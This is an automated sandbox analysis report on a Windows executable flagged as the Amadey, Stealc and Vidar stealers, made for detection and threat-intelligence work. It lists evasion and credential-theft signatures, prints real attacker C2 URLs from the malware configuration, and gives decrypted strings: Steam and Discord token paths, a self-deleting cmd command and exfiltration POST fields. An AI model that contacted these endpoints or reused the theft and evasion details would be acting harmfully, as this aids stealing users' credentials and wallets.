Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483195
MD5: 45fd30020c12378c242dc90687edc24c
SHA1: 934cd43ff8bd35e77d7df2cbc3aa5d96b672e4bf
SHA256: f4a7d43dc4cdf21cc7a58af7c66386cea1616658f15b996691fbb85a7cb06b9d
Tags: exe

Detection

Amadey, Babadeda, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypter family, allowing threat actors to encrypt and obfuscate malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "85.28.47.31/5499d72b3a3e55be.php"}
Source: 44.2.48f0ec6733.exe.400000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.7656.19.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \.purple\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: accounts.xml
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: token:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SteamPath
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \config\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ssfn*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: config.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Steam\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: browsers
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: done
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: soft
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: https
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: POST
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: hwid
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: build
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: token
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: file_name
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: file
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: message
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: screenshot.jpg
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcatA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OpenEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Sleep
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrlenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ExitProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: user32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateDCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sscanf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HAL9TH
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: JohnDoe
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DISPLAY
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: http://85.28.47.31
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: silence
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /5499d72b3a3e55be.php
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /8405906461a5200c/
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sila
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalLock
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HeapFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process32Next
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process32First
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LocalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindClose
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: WriteFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CopyFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLastError
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OpenProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ole32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wininet.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: shell32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: psapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SelectObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BitBlt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DeleteObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoInitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CloseWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wsprintfA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CharToOemW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wsprintfW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrStrA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrCmpCW
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C596C80

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Unpacked PE file: 24.2.ee7a49fbf0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64097 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64155 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 18.65.39.112:443 -> 192.168.2.5:64195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:64197 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64216 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64214 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64218 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64219 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64262 version: TLS 1.2
